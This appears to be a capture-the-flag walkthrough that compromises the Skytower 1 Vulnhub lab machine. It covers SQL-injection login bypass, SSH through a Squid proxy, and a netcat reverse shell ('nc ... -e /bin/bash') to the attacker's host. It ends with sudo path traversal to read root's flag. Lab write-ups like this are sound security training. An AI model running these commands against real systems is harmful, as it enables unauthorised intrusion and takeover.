Today, Lets work on the Skytower 1 Vulnhub Machine.
Lets find the IP first.
root@kali:~# nmap -sn 192.168.18.0/24 Nmap scan report for 192.168.18.94 Host is up (0.0086s latency). MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
So, our IP is
192.168.18.94. Lets do a simple port scan.
root@kali:~# nmap -O -sV 192.168.18.94
There is. web server running on port 80. Lets have a look.
A login page, Lets try SQL Injection.
We can use Burpsuite for this. Download a list of payloads to be checked from here.
Now lets capture the request in Burp
Then, Right click and send to Intruder.
Set attack type to ‘
pitchfork‘ and make sure that the
password fields are selected.
Now, Go to
payloads and load the payload list we downloaded to first and second payloads.
When the attack goes on, we can notice the response length of some requests are 231 and some are 1838. The ones with 1838 are the ones we want. They are successful logins.
Here lets try
'-' as email and password.
and, we’re in!
We have the SSH login credentials now. Lets try logging in.
Its not getting connected. But remember, we have a Squid proxy opened on port 3128.
Lets try connecting through it.
add the following line to
http 192.168.18.94 3128
Now, lets try connecting to the machine.
We logged in to the server, and logged out automatically. lets try running a command upon login.
root@kali:~# proxychains ssh -t email@example.com ls -la
Ok, So our command is working. Still we are getting logged out. Lets try to get a reverse shell through this.
First check if netcat is present there.
Yes, Now lets spawn a reverse shell.
root@kali:~# nc -nlvp 4444 listening on [any] 4444 ...
We have executed the command and got a reverse shell in our kali machine.
We are in, now lets have a look at /etc/passwd
There are two more users, sara and william.
Lets try to find out the passwords of sara and william too and log in.
username: firstname.lastname@example.org password: '-' username: email@example.com password: '-'
We got the password of sara. Lets try logging in.
root@kali:~# proxychains ssh -t firstname.lastname@example.org nc 192.168.18.92 4444 -e /bin/bash
We got access to sara’s account.
sudo -l ro view sara’s sudo permissions.
So, Sara can use
/accounts/ directory with root permissions.
According to this page, https://superuser.com/questions/355029/how-to-automatically-run-commands-on-ssh-login
we can execute a script upon ssh login if we place that in
Lets have a look.
Lets try removing this and login again.
Now we can use
sudo ls /accounts/ on the machine with root permissions.
sudo ls /accounts/../ ? Lets try
Using this method, we can go back to
/root directory and find a
flag.txt file there.
cat to read the file.
sudo cat /accounts/../root/flag.txt
We got the root password now. Lets try to be root using su command.
We are root!